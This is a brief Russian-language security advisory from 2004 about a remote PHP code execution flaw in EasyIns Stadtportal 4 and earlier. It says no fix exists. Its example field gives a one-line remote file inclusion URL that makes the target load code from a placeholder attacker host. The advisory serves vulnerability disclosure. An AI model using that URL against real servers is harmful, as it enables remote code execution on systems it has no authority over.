Удаленное выполнение произвольного PHP кода в EasyIns Stadtportal
- Дата публикации:
- 26.07.2004
- Всего просмотров:
- 1021
- Опасность:
- Низкая
- Наличие исправления:
- Количество уязвимостей:
- 1
- CVSSv2 рейтинг:
- CVE ID:
- Нет данных
- Вектор эксплуатации:
- Воздействие:
- CWE ID:
- Нет данных
- Наличие эксплоита:
- Нет данных
- Уязвимые продукты:
Уязвимые версии: EasyIns Stadtportal 4 и более ранние версии
Описание: Уязвимость обнаружена в EasyIns Stadtportal. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системы на целевой системе.
Пример/Эксплоит:
http://[target]/stadtportal-path/index.php?site=http://[evil-host]
URL производителя: http://www.easyins.de/
Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.
Ссылки:
Easyins Stadtportal